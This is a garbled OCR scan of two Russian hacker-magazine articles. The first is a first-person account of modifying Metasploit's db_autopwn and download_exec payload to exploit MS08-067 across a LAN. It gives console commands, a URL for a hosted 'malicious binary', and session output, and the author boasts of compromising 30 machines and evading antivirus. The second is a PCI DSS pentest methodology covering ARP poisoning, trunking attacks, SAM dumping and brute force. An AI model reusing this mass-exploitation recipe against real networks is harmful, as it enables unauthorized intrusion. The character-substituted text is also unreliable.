конкретную версию (ѴѴіпсІоѵѵзХР 5РЗ Риззіап 
(І\ІХ]] и пробуем заново. Опятьоблом — «Ехріоіі 
Іаііесі: ТЬе зегѵег гезропсіеб ѵѵМ:Ь еггог: 5ТАШ5_ 
0ВЗЕСТ_І\ІАМЕ_І\І0Т_Е0иі\І0 (СоттапсІ=1 62 
ѴѴо гсі С о и п 1;= 0 ] » . Эта ошибка навевала мысль 
о невозможности подключения к пайпу. Я 
включил общий доступ кфайлам и в случае 
автоопределения версии получал следующий 
результат — «Эеіесіесі ТагдеЕ ѴѴіпсІоѵѵзХР 
5Р0/5Р1 ипіѵегзаі— ЕхрІоіНаіІесЕ ТЬе зегѵег 
гезропсіеб ѵѵіЕі еггог: 5ТАТІЭ5_0ЕиЕСТ_І\ІАМЕ_ 
І\І0Т_Е0ІЛ\ІВ (Соттапб=162 ѴѴогбСоип1:=0]». 
Уже другое, но все равно не то. В случае явного 
указания цели эксплойттакже не работал. 
Однако если сменить пайп с ВР0ѴѴ5ЕР на 
5РѴ5ѴС, можно получитьзаветный шелл. 
Конечно, здорово, но для реализации нужно 
заранее знать версию операционной системы 
на удаленной машине, что для автосплойта 
совсем не катит. Но ведь я пробовал сплойт на 
локалке, и он работал! Оставалась последняя 
надежда — расшарить какую-нибудь папку. Это 
ничуть не изменило картину. Я готов уже был 
рвать на себе волосы и крушить-ломать все 
подряд. От бессилия я стал гуглить и наткнулся 
на какой-то баглист, в котором парень писал о 
жуткихтерках с фаером. Тогда так. Запускаем и 
сразуже останавливаем чудо-мега-фаер мел- 
комягких... Эксплойт работает, какмиленький! 
Причем на обоих пай пах одинаково хорошо 
определяет версии сервис пака и создает 
любезные глазу сессии. 

Итак, стестовой настройкой я определился, 
расклонировал систему и получил стенд из 
трехуязвимых машин. 

НУЖЕН ТРАНСПОРТ 

Для реализации автоматической систе- 
мы эксплуатации необходимо обеспечить 
транспорт и запуск созданного бинарника 
на уязвимых системах. Окинув взглядом 
доступные нагрузки, я радостно потер руки и 
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ЗАДАЕМ 5РХ ОПЦИИ ДЛЯ РАСПАКОВКИ И ЗАПУСКА НА ВЫПОЛНЕНИЕ 



принялся окучивать нагрузку ѵѵіпбоѵѵз/ирехес/ 
ЬіпсИср. Ее цель как раз и состоит в загрузке 
файла на хост с последующим исполнением. 
Увы, радость быстро улетучилась, когда я 
обнаружил, что ни хрена она не пашет. Позже я 
выяснил, что в никсовой версии метасплойта 
все работает на ура, однако я подразумеваю 
запуск метасплойта на поломанной виндов- 
ской машине, следовательно, нужно искать 
другие варианты. Выходом стало исполь- 
зование нагрузки ѵѵіпсІоѵѵ5/боѵѵп[оаб_ехес. 

Для этого необходим доступный ѴѴеЬ-сервер, 
куда надо положить созданный бинарник. 
Серва к можно поднять на самой машине, 
например, используя ХАМРР. Я так и поступил. 
ЭРЕ бинарника указываем в одноименном 
параметре нагрузки и запускаем эксплойт. 

На выходе получаем ошибку — « Ехріоіі; ба і ІесІ : 
І\Іо епсосіегз епсобеб Еіе ЬиібегзиссеззМІу». 
Все правильно: бо\л/п1оас1_ехес представляет 
собой цельную нагрузку, которая не умещается 
в буфер сплойта, поэтому нужно использовать 
зіадег, например, боѵѵпІоасІ_ехес/ЬіпсІ_1:ср. 



Проводим аналогичные настройки и получаем 
нужный результат. Через пару минут я мог 
коннектиться по РЭР с админскими правами, 
не выбивая текущего юзера. 

Мое внимание при влек тот факт, что задание 
оставалось висеть, а сессия так и не созда- 
валась. Для единичного воздействия это 
вполне нормально, но при автосплойте сети 
мы получим большие проблемы. Во-первых, 
модуль бЬ_аи1:орѵѵп выполняется многопо- 
точно и имеетограничение на количество 
одновременно выполняемых заданий, которое 
поумолчаниюравноб. Это значит, что при ус- 
пешной эксплуатации 5 узлов остальные будут 
бесконечно и бестолково болтаться в очереди. 
Во-вторых, после прогона бЬ_аи1:орѵѵп 
неплохо было бы иметь список порутанных 
узлов, который удобно получать по команде 
«зеззіопз -I». Конечно, эти ограничения 
нетакуж и существенны, но хочется же все 
сделать красиво, — поэтому я решил немного 
подправить код бо\л/п1оас1_ехес стем, чтобы он 
все-таки приводил к созданию сессии. 
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ПОСЛЕДНИЕ ПРИГОТОВЛЕНИЯ 



ДЛЯ БЫСТРОГО ПОДНЯТИЯ ѴѴЕВ- И РТР-СЕРВЕРА 

УДОБНО ИСПОЛЬЗОВАТЬХАМРР 




> іпіо 

• Чтобы быстро 
поднять ѴѴеЬ- или 
РТР-сервер можно 
воспользоваться 
специальными 
сборками, о которых 
писалось в статье 
«Сервер в один 
клик!» в февральском 
-г . Лично мне боль- 
ше по душе ХАМРР 
[ арасбеітіепсіз.огд/ 
еп/хатрр.ЫтІ ]. 

• Статья не претендует 
на полноту, а пред- 
ставляет собой некий 
РоС. Рассмотренные 
методы можно серь- 
езно усовершенство- 
вать, в частности, ре- 
ализовать удаление 
всех временных фай- 
лов, осуществлять 
проверку версии 
Іегтзгѵ.сіи в системе, 
использовать сущес- 
твующие учетные 
записи, например, 

зи ррогІ_388945аО, 
а также оформить все 
действия в консоли 
метасплойта в виде 
одного скрипта. 

Если тебя посетит 
вдохновение, пиши на 
мыло, буду рад любой 
обратной связи. 










АІЛОІТ НА ВСЕ СЛУЧАИ ЖИЗНИ 



Код нагрузки находится по адресу %аррба!;а%\пп5І : 32\ 
т о сі и Іе з\р а у Іо а сі б\б і п д Іе з\ѵѵ і п сі оѵѵз\сІ о ѵѵ п Іо а сІ_е хе с . 
гЬ и предельно прост. Очевидно, что сессия не созда- 
ется по причинетого, что нагрузка просто не предна- 
значена для создания шелла. Это легко поправить! 
Достаточно добавить параметр зеззіоп со значением 
МзЕ:5е55Іопз::Соттапб5Ьеи. Исправленный исходник 
ждеттебя на диске. 

НЕ БОГИ ГОРШКИ 
ОБЖИГАЮТ 

Последнее, что осталось сделать — это научить функ- 
цию бЬ_аіЛорѵѵп применять нагрузку боѵѵпІоасІ_ехес. 
Если помнишь, в своем изихаке 5КѴ02 предлагал 



использовать ключ «-Ь», который указывает, что будет 
использоваться Ьіпб-шелл. Для нас это вообще не 
имеет смысла, так как ручками мы работать не хотим. 
Необходимо переправить бинарник на уязвимую тачку 
и выполнить его. Из справки по функции видно, что 
параметров, отвечающих за использование той или 
иной нагрузки, нет. бЬ_аиІорѵѵп умееттолько привя- 
зывать шелл или создавать реверс-коннект. Причем 
из исходников модуля бЬ (кури файл % а р р сі а 1; а %\ 
тзі : 32\иЬ\т5І : \иі\соп5о[е\соттапб_бІ5ра1:сЬег\бЬ.гЬ] 
становится очевидно, что это даже не теіегргеіег, а 
депегіс шелл. В погоне за универсальностью разрабы 
оставили нас не у дел, так что для реализации моего 
злого замысла я решил захачить модуль и реализо- 
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-ю, (гедех) Опіу гшг за^іиіег ѵПоэе папе ша^сіъез Ыге гедех 

ѵ сіЬ_аиИ орѵп -р -& -Р иіп^оиів/^оттІоаі_вквс/Ьіпі^_Ьср -а тв08_0€7 
Цііпд рауіо&й иіпйоиЕ/йсип1одй_Бі{ес/Ьіпй_Ъ.ср 

(1/3): ЬттеЫпд екр1іоііі/ѵтііиіім^5/5]аѣ/и50®_0б7_пбс.йрі адат5г 173,16.1.13:445. 
ІІ5 ілд рауіоасі иіпйоѵ5/йоъш1оас1_ех.ее/ЫііЛ_Ьср 

(2/3): ІашісЬіпд екр1оіс/ѵіп<іоѵ5/5тіі/т503_0€?_гіесарі адаіпвд 172.16.1.11:445. 
5(.&гѣей Ъіпсі ЬапсИег 

ТТе і г±д рауіоасі ѵіпсіо ѵе / гістлъі оасі_е х е с/Ь іпсі_Ъер 

( 3 /Э ) : ЬаітсЬ шд ехрі о І.С /«іпбосгЕ: / ешЬ / шз 08__06 7_мъ ар і адаіпз& 172 ,16.1.13:445. 
$ъ&гъе<і Ы«<1 Ьапйіег 

ЗъагЪеСІ ЪІШІ ЬапсІІег 

АиЬсааЫсаІІу (ДеЪесЪіпд ійіе Ъаігдеі;. . . 

АиЪоа&ЫсаНу йесесьіпд ЬПе ЪагдеЬ, .. 

АиЬоааСісаІІу йеЬесЫпд ЪПе СагдеЬ, .. 

ШідегрЕіпъ: ігіпііоѵг ХР Зегѵісе Раск 3 - Іапд: Ризкіап 
ЗеІесЪеі Татсдаы Ѵііівоиге ХР ЁРЗ Риазішѵ (ИХ) 

РіпдеігрігІгЛ; ВДіпйоѵг ХР Эеѵѵісе Раск 3 - Іапд; Аиакіап 
Зеі ессей ТагдеЬ: ДОіпйаѵг ХР ЁРЗ Риз 5 і ап (ИХ) 

Ггіддвгіпд Ыне ѵиІпегаЬіііЪу . . . 

Тгіддегіпд с.Ье ѵиіпегаЫІіЪу. , . 

РіпдегрЕІп^: Ѵіпсіоѵб ХР Зегѵіее Раск 3 - Іапд: Р.иззіап 
5е1ееге<3 Тагдеъ: НіпбоиЕ ХР ЁРЗ Йиезійп (ИХ) 

8 ап41п д зъаде (365 Ьуъез) 

С ошв. ап сі зЬеІІ смсіоп 4 орепей (172.16,1.10:2307 -> 172.16.1.11:4445) 
Тгіддагіпд ЪЬ* ѵиІпегаЫІІЪу. . . 

Зешііпд Е^ада (365 ЬуЬеа) 

Совшапгі зЬаІІ ейееіоп 5 арепей (172-16.1.10:2306 -> 172-16,1,12:4445) 

Зепсііпд а^ада (365 Ъуъег) 

Сои»ап(і зЬеІІ аеааіап 6 орепе* (172.16.1.10:2303 -> 172.16.1.13:4445) 

Сошпапй зііеіі аеазіап 3 сіазей. 

> газвіопз -1 



Ассіѵе гегзіспг 



16 Эаксгірьіоп 

4 Сошвапб еН*11 

5 Сошвапб аНаіІ 

6 Сошвапб аЬаІІ 



Типпаі 

172.16.1.10:2307 -> 172. 16. 1 . 11 : 4445 
172.16.1.10:2306 -> 172. 16. 1 . 12 : 4445 
172.16.1,10:2308 -> 172.16.1.13:4445 
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АВТОСПЛОЙТ В ДЕ 



вать возможность применения произволь- 
ной нагрузки. 

Как и в случае с модулем сІо\л/пІоасІ_ехес р на 
диске тебя ждет пропатченная версия сІЬ.гЬ; 
на этом же БУБ ищи и сам патч. 

Хотелось все сделать по-взрослому и краси- 
во, так что перво-наперво я модифицировал 
вывод справки, добавив в него пункт, отве- 
чающий за описание нового параметра «-Р». 
Логика работы следующая: если установлен 
параметр «-Р», будет применена указанная 
нагрузка; в противном случае модуль работа- 
ет та к же, как и оригинальный вариант. 

Для задания параметров эксплойта или 
нагрузки я предлагаю два варианта. Л ибо 
использовать переменные, либо первона- 
чально настроить модуль и сохранить его 
состояние. Параметры будут сохранены в 
%аррба1:а%\.пп5І : 3\сопіід и использованы 
поумолчанию при вызове модуля. Мне 
больше нравится второй вариант, поэтому в 
графическом интерфейсе я выбрал экс- 
плойт тз08_067 и настроил его следующим 
образом: 

- ТАКСЕТ=0 (автоматическое опреде- 
ление) ; 



- РАУЬ0АБ=отіпс1оотз/(1оші1оасІ_ехес/ 
ЫпЛ_Сср ; 

- ШЬ=ЪСЦр://172 . 16 .Я 10/зБ . ехе . 

Здесь 1 72.1 6.1 .1 0 — адрес машины, на ко- 
торой поднят ѴѴеЬ-сервер, а зСехе — злове- 
щий бинарник, который будет загружаться 
на конечные узлы. Итак, все готово, пора 
сплойтить. 

КОРОЛИ СЕТИ 

Сначала я удостоверился, что все работает, 
на тестовой сети. После ввода нужных команд 
все три машины ушли в перезагрузку, а затем 
радостно встречали меня по ПОР. Пора при- 
ступать к полномасштабным испытаниям. 
Запускаем консоль теіазріоіі и генерим 
следующие команды: 

КОМАНДЫ НАЗАПУСКАВТ0СПЛ0ЙТА 

Іоасі сіЬ_зд1іСеЗ 
сПэ_сгеаСе 

сПэ_птар -зТ -РЫ -Р3445 -р445 
172.16.1.0/24 

зеСд ШЬ АССр : //172 . 16 . 1 . 10/зС . ехе 
с!Ь_аиБорѵт -е -р -Р ѵі іпсіомз/ 
Лоѵт1оас1_ехес/Ьіпс1_Бср -ш тз08_067 



» 




ИЗВЕЧНАЯ ПРОБЛЕМА 

С КОДИРОВКАМИ 

С замиранием духа я нажал <ЕІ\ІТЕН> и по- 
шел курить. Я человек добрый и дал юзверям 
две минуты на сохранение результатов из 
безумно важной деятельности. Вернувшись 
к компу и набрав в консоли «зеззіопз -I», я 
увидел все те же 30 машин, что и при первом 
эксперименте. Сохранив результаты в блок- 
ноте, я вооружился ПП5І5С и принялся прове- 
рять качество проделанной работы. Блестя- 
ще! Я мог рутать 30-ю машинами, затратив на 
это всего 5 минут. Особо меня обрадовал тот 
факт, что ни Е5ЕТ N0032 4, ни Ог.ѴѴеЬ даже 
не ругались и дали спокойно осуществиться 
моим планам. Позже я узнал, что пропалился 
на ОіЛрозІ: и Казрегзку Апб-Наскег. 

А теп ерь посчитаем. ЫМАР нашел 1 16 узлов 
с открытым портом 445, из которых мне очень 
быстро достались 30. Больше четверти узлов 
в л о калке попались, причем не просто так, 
а с нормальным графическим интерфейсом 
и практически без особых с моей стороны 
усилий! Круто, нетакли? При необходимости 
можно было вручную порутать еще, подбирая 
нужный сервис пак на пайпе 5РѴ5ѴС. 

НЕТ НИЧЕГО 

НЕВОЗМОЖНОГО, ХАКЕР! 

Уже реализовав свои злостные планы, я 
наткнулся на ачате на статью одного чела 
Погит.апбсЬаЕгиАЬгеаб99665.Ыпп[ |. который 
описывал, как получать дедики с использо- 
ванием метасплойта. Там он гневно говорил о 
парнях, которые думают, что можно получить 
дедик одним движением руки. Цитирую: 
«если кто-то хочет жать на кнопку «приме- 
нить в Местаслойте» и чтобы он вам выкиды- 
вал готовые деды, ИДИТЕ ЛЕСОМ, дабы не 
сказать грубей!». Мне кажется, он не прав :). 
Никогда не говори «невозможно», пока сам 
не пошевелишь извилинами и не попробу- 
ешь. Учись беречь себя и автоматизировать 
рутинные действия настолько, насколько это 
возможно! Удачи, хакер, слушай метал и будь 
счастлив! И да пребудетстобой черная магия 
автосплойта! т 
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Раутепі СагсІ ІпсІизЩу Баіа Зесигііу ЗіапсІагсІ (РСІ 055) 




ПРАВИЛА 

ПЕНТЕСТА 



АУДИТ ПО СТАНДАРТУ РСІ 055 

Любое объективное и полноценное тестирование на проникновение 
должно выполняться сучетом рекомендаций и правил. 

Хотя бы для того, чтобы быть грамотным спецоминичегоне упустить. 
Поэтому, если ты хочешь связать свою профессиональную деятель- 
ность с пентестом — обязательно ознакомься со стандартами. 

А в первую очередь — с моей статьей. 



Правила и рамки информационного пентес- 
тинга представлены в методологиях 055ТММ 
и 0ѴУА5Р. Впоследствии полученныеданные 
можно легко адаптировать для проведения оцен- 
ки соответствия с какими-либо промышленными 
стандартами и «лучшими мировыми практика- 
ми», такими как, СоЬіІ, стандартами серии 150/1 ЕС 
2700х, рекомендациями СІ5/5АІ\І5/І\ІІ5Т/е1:с и — в 
нашем случае — стандартом РСІ 055. 

Безусловно, накопленныхданных, полученных в 
процессетестирования на проникновение, для про- 
ведения полноценной оценки по промышленным 
стандартам будет недостаточно. Но натоон и пентест, 
а неаудит. Крометого.дляосуществлениятакой 
оценки в полном объеме однихлишьтехнологичес- 
кихданных по любому будетмало. Для полноценной 
оценки требуется интервьюирование сотруд н и ко в 
различных подразделений оцениваемой компании, 



анализ распорядительной документации, различ- 
ных процессов ИТ/И Б и много еще чего. 

Что касается тестирования на проникновение в 
соответствии стребованиями стандарта по защи- 
те информации в индустрии платежных карт, — он 
не намного отличается отобычного тестирования, 
проводимого с использованием методикОББТММ 
и 0ѴѴА5Р Более того, стандартом РСІ Б55 реко- 
мендуется придерживаться правил 0ѴѴА5Р при 
проведении какпентеста (АзѴ), та к и аудита (ОБА). 
Основные отличиятестирования по РСІ Б55 
оттестирования на проникновение в широком 
смысле этого слова заключаются в следующем : 

1. Стандартом не регламентируется (а значит и 
нетребуется] проведение атаке использованием 
социальной инженерии. 

2. Все проводимые проверки должны максималь- 
но минимизировать угрозу «Отказа в обслу- 



живании» (0о5). Следовательно, проводимое 
тестирование должно осуществляться методом 
«серого ящика» с обязательным предупреждени- 
ем администраторов соответствующих систем. 

3. Основная цел ьта кого тестирования — это попыт- 
ка осуществления несанкционированного доступа 
кданным платежных карт (РАІ\І, СагсІІтоІсІег ІЧате и 
т.п.]. Под методом «серого ящика» (дгауЬох) подра- 
зумевается выполнение различного рода проверок 
с предварительным получением дополнительной 
информации об исследуемой системе на разных 
этапахтестирования. Это позволяетснизить риск 
отказа в обслуживании при проведении подобных 
работ в отношении информационных ресурсов, 
функционирующих в режиме 24/7. 

В общем случаетестирование на проникновение 
потребованиям РСІ должно удовлетворять следу- 
ющим критериям: 
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+ Ргате 79 (60 Ьуіез оп міге, 60 Ьуіез саріигесО 
□ ІЕЕЕ 802.3 ЕіНегпеі 



Е оез-Н па-Моп: сор/ѵтр/отр/РАдр/иоі_о (01 : 00 : Ос : сс : сс : сс) 
Е 5оигсе: сі зсо (00 :11 :сЬ : еі : Ьс :сі 2 ) 

І_епді:Н: 39 

Тгаііег: 00000000000000 
+ Боді саі -Бі пк сопігоі 
Ш оупатіс тгипкіпд ргоіосоі 



ВЫЯВЛЕННЫЙ ЗТР-ТРАФИК 



п.11.1(Ь) — Анализ защищенности бес- 
проводных сетей 

п . 11 . 2 — Сканирование информаци- 
онной сети на наличие уязвимостей 
( АзѴ) 

п . 11 . 3 . 1 — Проведение проверок 
на сетевом уровне (ЫеЩлгагк-Іауег 
репебгабіоп кезкз) 
п . 11 . 3 . 2 — Проведение проверок на 
уровне приложений ( Арріісабіоп- 
Іауег репебгабіоп безбз) 

На этомтеория заканчивается, и мы переходим к 
практике. 

ОПРЕДЕЛЕНИЕ ГРАНИЦ ПРО- 
ВОДИМОГО ИССЛЕДОВАНИЯ 

В первую очередь необходимо понять границы 
тестирования на проникновение, определиться 
и согласовать последовательность выполняемых 
действий. В лучшем случае со стороны подраз- 
деления ИВ может быть получена карта сети, на 
которой схематично показано, каким образом 
процессинговый центр взаимодействуете общей 
инфраструктурой. В худшем — придется общаться 
с системным администратором, который в курсе 
собственных косяков, и получение исчерпываю- 
щихданныхоб информационной системе будет 
затруднено его нежеланием делиться своими 
уникальными [или не очень, — прим. РогЬ) зна- 
ниями. Так или иначе, для проведения пентеста 
по РСІ 055, как минимум, требуется получить 
следующую информацию: 

• сегментация сети (пользователь- 
ская, технологическая, ДМ3, процес- 
синг и т . д . ) 

• межсетевое экранирование на грани- 
цах подсетей (АСЬ/МСЭ) 

• используемые ТДеЬ-приложения и СУБД 
(как тестовые, так и продуктивные) 

• используемые беспроводные сети 

• какие-либо детали обеспечения 
безопасности, которые необходимо 
учесть в ходе проведения обследова- 



ния (например, блокировка учетных 
записей при N попытках неправиль- 
ной аутентификации) , особенности 
инфраструктуры и общие пожелания при 
проведении тестирования 

Обладая всей необходимой информацией, пере- 
численной выше, можно организовыватьсвое 
временное пристанище в наиболее оптимальном 
сегменте сети и приступать кобследованию 
информационной системы. 

МЕТѴѴОКК-І.АѴЕВ 
РЕМЕТКАТІОМ ТЕ5Т5 

Для начала стоит провести анализ пробегаю- 
щего мимо сетевого трафика с помощью любо- 
го сетевого анализатора в «неразборчивом» 
режиме работы сетевой карты (рготізсиоиз 
тобе]. В качестве сетевого анализатора для 
подобных целей замечательно подходит 
ѴѴігезбагк или СоттѴіеѵѵ. Чтобы выполнить 
этот этап, хватит 1 -2 часов работы снифера. 

По прошествии этого времени накопится 
достаточно данных для проведения анализа 
перехваченного трафика. И в первую очередь 
при его анализе следует обратить внимание на 
следующие протоколы: 

• протоколы коммутации (ЗТР, БТР и 
т . п . ) 

• протоколы маршрутизации (КІР, 

ЕІСКР и т. д . ) 

• протоколы динамической конфигура- 
ции узла (БНСР, ВООТР) 

• открытые протоколы (Реіпеб, гіодіп 
и т . п . ) 

Что касается открытых протоколов, — вероятность 
того, что они попадутся во время снифания про- 
ходящего мимотрафика в коммутируемой сети, 
достаточно мала. Однако, если та ко го трафика 
много, то в обследуемой сети явно наблюдаются 
проблемы в настройках сетевого оборудования. 
Во всех остальных случаях присутствует возмож- 
ность проведения красивыхатак: 



• классической атаки МІТМ (Мап іп ДЬ.е 
шіббіе) в случае, когда используется 
БНСР, КІР 

• получение роли корневого узла ЗТР 
(Кооб Вгібде) , что позволяет пере- 
хватывать трафик соседних сегментов 

• перевод порта в магистральный ре- 
жим с помощью БТР (епаЫе бгипкіпд) ; 
позволяет перехватывать весь трафик 
своего сегмента 

• и других 

Для реализации атак на протоколы коммутации 
доступен замечательный инструмент Ѵегзіпіа. 
Предположим, что в процессе анализа трафика 
были выявлены пролетающие мимо ОТР-пакеты 
(смотри скриншот]. Тогда отправка пакета БТР 
АССЕ55/0Е5ІПАВІ_Е может позволить перевести 
порт коммутатора в магистральный режим. Даль- 
нейшее развитие этой атаки позволяет прослу- 
шивать свой сегмент. 

Послетестирования канального уровня стоит 
переключить внимание на третий уровень 051. 
Дошла очередь и до проведения атаки АПР- 
роізопіпд.Тутвсе просто. Выбираем инструмент, 
например, Саіп&АЬеІили ЕКегсар и обговарива- 
ем с сотрудниками ИБ детали проведения этой 
атаки (втом числе, необходимость в проведении 
атаки, направленной на перехват односторон- 
него 55Ц Все дело втом, что в случаеуспешной 
реализации атаки АРР-роізопіпд вотношении 
всего своего сегмента может наступить ситуа- 
ция, когда компьютер атакующего не справится 
с потоком поступающих данных и, в конечном 
счете, это может стать причиной отказа в обслу- 
живании целого сегмента сети. Поэтому наиболее 
правильным будет выбрать единичные цели, 
например, рабочие места администраторов и/ 
или разработчиков, какие-либо определенные 
сервера (возможно контроллер домена, СУБД, 
терминальный сервер, еіс]. 

Успешно проведенная атака АВР-роізопіпд 
позволяет получить в открытом виде пароли к 
различным информационным ресурсам — СУБД, 
каталогу домена (при понижении проверки 
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Тестирование 



на проникновение 
все больше напоми- 
нает игру в квест :). 



гкГЬіі 



1 НТТР://ѴѴѴѴѴѴ I 

1Г 



> Ііпкз 

• рсігесигііузіапсіагсіз. 

огд — РСІ ЗесигКу 
Зіапсіагсіз Сои псіі. 

• рсізесигііѵ.ги — пор- 
тал, посвященный 
РСІ 055 от Информ- 
защиты. 

• рсісізз.ги — пор- 
тал, посвященный 
РСІ 055 от ОідТаІ 



ЗесигКу. 

• І5есот.огд/о55і:ппт 
— Ореп Зоигсе 
ЗесигТу Тезбпд 
МеіЬосІоІоду Мапиаі. 

• оѵѵазр.огд — Ореп 
ѴѴеЬ Арріісабоп 
ЗесигКу РгоіесС 



подлинности І\ІТІ_М), ЗІЧМР-соттипкузІтіпд и пр. В менее 
удачном случае могутбыть получены хеш-значения от паролей 
к различным системам, которые нужно будет за время проведе- 
ния пентеста постараться восстановить по радужным та блицам 
(гаіпбоѵѵІаЫез], по словарю или атакой «в лоб». Перехвачен- 
ные пароли мог^ использоваться где-то еще, и впоследствии 
это также необходимо подтвердить или опровергнуть. 
Крометого, стоит проанализировать весь перехваченный 
трафик на присутствиеСАѴ2/СѴС2/С\Л/2/СЮ/РІЫ, передавае- 
мы х в откр ыто м в и де . Дл я это го м ожн о п ро пустить сохраненный 
сар-файл через ЫеіРезібепІ; и/или 0x4553- Іпіегсеріег. Второй, 
кстати, замечательно подходит для анализа накопленного 
трафика в целом. 

АРРІ_ІСАТІОМ-І_АѴЕР 
РЕЫЕТРАТІОМ ТЕ5Т5 

Переходим на четвертый уровень 051. Туг, в первую очередь, 
все сводится к инструментальному сканированию обследуемой 
сети. Чем его проводить? Выбор нетакужи велик. Первона- 
чальное сканирование можно выполнитьс использованием 
ІЧтар в режиме «Разізсап» (ключи -Р-Т АддгеззіѵеІ Іпзапе], 
а на следующих этапахтестирования проводить сканирова- 
ние по определенным портам (ключ -р], например, в случаях 
обнаружения наиболее вероятных векторов проникновения, 
связанныхсуязвимостями в определенных сетевых сервисах. 
Параллельно стоит за пустить сканер безопасности — ІЧеззиз 
или ХЗрібег (у последнего результаты помясистей будут] в режи- 
ме выполнения только безопасных проверок. При проведении 
сканирования на уязвимости необходимо также обращать вни- 
мание на присутствиеустаревших систем (например, ѴѴіпсІоѵѵз 
ЫТ 4.0], пото му как стандартом РСІ запрещается их использова- 
ние при обработке да иных держателей карт. 

Не стоит, при обнаружении критической уязвимости в 
каком-либо сервисе, сразуже бросаться на ее эксплуатацию. 
Правильный подход при тестировании по РСІ —это, во-первых, 
получить более полную картину состояния защищенности 
обследуемой системы (является ли эта уязвимость случайной 
или она встречается повсеместно], а во-вторых, согласовать 
свои действия по эксплуатации выявленныхуязвимостей в 
определенных системах. 

Ито га м и и н стру м е нта л ьн о го о бел едо в а н и я должн ы стать 
общая картина реализованных процессов ИБ и поверхностное 
понимание состояния защищенности инфраструктуры. Во вре- 
мя отработки сканов можно попросить ознакомиться с исполь- 
зуемой политикой ИБ в Компании. Для общего саморазвития :). 
Следующий этап — выбор целей для проникновения. На этом 
этапе следует провести анализ всей собранной информации, 
полученной входе прослушиваниятрафика и сканирования 
на уязвимости. Вероятно, кэтому моменту уже будут прослежи- 



ваться уязвимые или потенциальноуязвимые системы. Следо- 
вательно, пришло время воспользоваться этими недостатками. 
Как показывает практика, работа проходит по следующим трем 
направлениям. 

1. ЭКСПЛУАТАЦИЯ УЯЗВИМОСТЕЙ 
В СЕТЕВЫХ СЕРВИСАХ 

В далеком прошлом осталось время, когда эксплоитингбыл 
уделом избранных, способных хотя бы собрать чужой код и 
(о Боже!] подготовить свой шелл-код. Сейчас эксплуатация 
уязвимостей в сетевых сервисах, таких как переполнение 
буфера и иже с ними, доступна каждому. Причем, процесс все 
больше напоминаетигру в жанре «квест». Взятьхотя бы Соге 
ІтрасС в котором весь пентест сводится к клацанью мышкой по 
различным выпадающим менюшкам в красивой СШ-обертке. 
Подобный инструментарий здорово экономит время, которого 
при внутреннем пентесте нетакужи много. Потому шутки 
шутками, а фичисет, реализованный в Соге ІтрасС позволяет, 
особо неутруждаясь, последовательно выполнитьэксплуа- 
тацию, поднятие привилегий, сбор информации и удаление 
следов своего пребывания в системе. В связи с чем Соге Ітрасі: 
пользуется особой популярностьюузападныхаудиторов и 
пентесте ров. 

Из общедоступных инструментов подобного рода можноупо- 
м я нуть следующие сборки : Соге ІтрасС САІЧѴА5, 5АІ ЫТехрІоіІ: и 
всеми любимый МеіазрІокРгатеѵѵогк. Что касается первой трой- 
ки, —это все коммерческие продукты. Правда, некоторые старые 
версии коммерческих сборокутекали в свое время в интернет. 

При желании можно отыскать их в глобальной сети (естественно, 
исключительно с целью самообразования]. Нуа весь бесплатный 
свежачоксплоитов доступен и в Меіазріоіі: Ргатеѵѵогк. Конечно, 
существуютгего-сіау сборки, но это уже совсем другие деньги. 
Крометого, бытуетспорное мнение, что при проведении пентеста 
их использование является не совсем честным. 

На основе данных сетевого сканирования можно немного 
поиграть в хакеров :). Предварительно согласовав список 
мишеней, провести эксплуатацию обнаруженныхуязвимостей, 
а после выполнить поверхностный локальный аудит захва- 
ченных систем. Собранная на уязвимых системах информация 
может позволить повысить свои привилегии и на других ресур- 
сах сети. То есть, если в процессе проведения атаки ты порутал 
винду, то нелишним будет снять с нее базу ЗАМ (Ідбитр] для 
последующего восстановления паролей, а также секреты І_5А 
(Саіп&АЬеІ), в которых зачастую может храниться в открытом 
виде много полезной информации. Кслову, после проведения 
всех работ собранная информация о паролях может расцени- 
ваться в контексте соответствия или несоответствия требо- 
ваниям стандарта РСІ 055(п. 2.1 , п.2.1.1, п.6.3.5, п.6.3.6, п.8.4, 
п.8.5.х]. 
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ВСЕМИ ЛЮБИМЫЙ МЕТА5РІ.0ІТ РКАМЕѴѴОКК 



2. АНАЛИЗ 

РАЗГРАНИЧЕНИЯ ДОСТУПА 

Анализ разграничения доступа необходимо выпол- 
нять на всех информационных ресурсах, на которые 
удалось реализовать НСД. И на общих файловых 
ресурсах ѴѴіпсІоѵѵз (БМВ), на которых открыт 
анонимный доступ —тоже. За частую это позволяет 
получить дополнительную информацию о ресурсах, 
которые не были обнаружены во время сетевого 
сканирования, или наткнуться на другую инфор- 
мацию, различной степени конфиденциальности, 
хранимую в открытом виде. При проведении тести- 
рования по РСІ, в первую очередь, поискнаправлен 
на обнаружение да иных держателя карт. Поэтому 
важно понимать, ка к моіуд вы глядеть эти данные 
и искать их во всех информационных ресурсах, к 
которым имеется соответствующий доступ. 

3. АТАКА ТИ ПА БРУТФОРС 

Необходимо, какминимум, проверитьдефолты 
и простые комбинации логин-пароль. Подобные 
проверки требуется провести, прежде всего, в от- 
ношении сетевого оборудования (втом числе, для 
5ІЧМР) и интерфейсовудаленного администри- 
рования. При проведении АзѴ-сканирования по 
РСІ 055 не разрешается осуществлять «тяжелый» 
брутфорс, который можетпривести ксостоянию 
ОоБ. Но в нашем случае речь идетпро внутренний 
пентест по РСІ, а потому в разумном виде и без 
фанатизма стоит осуществить атаку по подбору 
простых комбинаций паролей кразличным ин- 
формационным ресурсам (СУБД, ѴѴЕВ, ОС ит.п.). 
Очередной этап — это анализ защищенности ѴѴеЬ- 
приложений. При пентесте по РСІ про глубокий ана- 
лиз ѴѴеЬ речи не идет. Оставим это ОБА-аудиторам. 
Здесь достаточно осуществить ЫаскЬох-сканиро- 
вание с выборочной верификацией эксплуатабель- 
ныхзегѵег/сііепі-зісіеуязвимостей. В дополнение 
к уже упомянутым сканерам безопасности можно 
воспользоваться сканерами, заточенными под 
анализѴѴеЬ. Идеальное решение — НРѴѴеЫпзресІ; 
или АсипебхѴѴеЬѴиІпегаЬіІіІуБсаппег (который, 
кстати, на«отлично»детектитбаги вА^АX]. Новее 
это — дорогая и непозволительная роскошь, а раз 
та к, то нам подойдет и ѵѵЗаб который в последнее 
время набираетобороты в плане детектирования 



различного рода уязвимостей вѴѴеб-приложениях. 
По поводу ручной верификации уязвимостей 
вѴѴеЬ! Необходимо, какминимум, проверить 
механизмы аутентификации и авторизации, ис- 
пользован непростых комби наций логин-пароль, 
дефолтов, а также всеми любимые ЗОБ-инъекции, 
